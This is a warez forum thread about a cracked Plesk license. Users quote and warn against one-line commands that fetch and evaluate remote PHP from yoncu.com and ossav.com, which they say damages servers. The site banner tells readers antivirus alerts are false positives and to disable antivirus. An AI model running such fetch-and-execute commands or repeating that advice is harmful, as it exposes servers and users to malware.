• You MUST read the Babiato Rules before making your first post otherwise you may get permanent warning points or a permanent Ban.

Our resources on Babiato Forum are CLEAN and SAFE. So you can use them for development and testing purposes. If your are on Windows and have an antivirus that alerts you about a possible infection: Know it's a false positive because all scripts are double checked by our experts. We advise you to add Babiato to trusted sites/sources or disable your antivirus momentarily while downloading a resource. "Enjoy your presence on Babiato"

Plesk Onyx Web Host Edition

Bro just curious how would you explain this code in your version?
Code:
plesk php -er "eval(file_get_contents('https://plesktrial.yoncu.com/?CMD=x'));";

Please be so kind as to inform about the commercial interest in this patch.

Tested on Plesk Obsidian and upon installing you are encouraged to purchase a [k]ed license from a sketchy site that will never gain my trust nor recieve my CC. :mad:

Please provide a genuine [k] solution or at least inform about the payment.

Reactions: pantax.digital
VERY IMPORTANT ATTENTION!

For those who installed the code ( plesk php -er "eval(file_get_contents('http://ossav.com/OLC'));" ) and now have the notification messages, run this code through the CLI and you will be able to give up the extension and correct Plesk.

plesk bin extension --list
plesk bin extension --uninstall OsSav

Sem Título.png

Reactions: sherone and 72ppi
Friend, tell me please, have you ordered licenses here? Very nice prices. Can I order?
No, don't, risk your credit card, and risk your server. I had to reinstall my server because I used this script, it changes critical system files.

For those who installed the code ( plesk php -er "eval(file_get_contents('http://ossav.com/OLC'));" ) and now have the notification messages, run this code through the CLI and you will be able to give up the extension and correct Plesk.

Sem Título.png
Good post. Another solution is setting the OSSav notification bar to 'display:none !important;' and setting chmod on the CSS to 600. A small hack and not a viable solution long term.

Friend, tell me please, have you ordered licenses here? Very nice prices. Can I order?
Don't use it. as @pantax.digital mentions - it fucks your server up.
Again, it's a really annoying huzzle where no commercial interest is mentioned before installation.

Reactions: pantax.digital

Sem Título.png
I tried this but message s still there

i'll try to answer with help from chatGPT XD

Guideline for editing main.js file in /opt/psa/admin/cp/public/javascript directory:

1. Open a terminal and navigate to the directory /opt/psa/admin/cp/public/javascript using the command
    cd /opt/psa/admin/cp/public/javascript.
  2. Use a text editor to open the main.js file. For example, you can use the command nano main.js or vi main.js.
  3. Find the following line of code in the main.js file:
    document.querySelector('div.pul-layout__header-addon').innerHTML=(false?'':'<center class="msg-box msg-warning"
  4. Append the following to the end of the line:
    style="display: none !important;"
  5. The final line of code should look like this:
    ... document.querySelector('div.pul-layout__header-addon').innerHTML=(false?'':'<center class="msg-box msg-warning" style="display: none !important;">'+atob ...
  6. Save the changes and close the text editor.

Make a backup of the original file before making any changes to it.

This is an old request thread from 2020, if you want updates or nulled versions then it needs to be in it's own resource thread.

AdBlock Detected

We get it, advertisements are annoying!

However in order to keep our huge array of resources free of charge we need to generate income from ads so to use the site you will need to turn off your adblocker.

If you'd like to have an ad free experience you can become a Babiato Lover by donating as little as $5 per month. Click on the Donate menu tab for more info.

I've Disabled AdBlock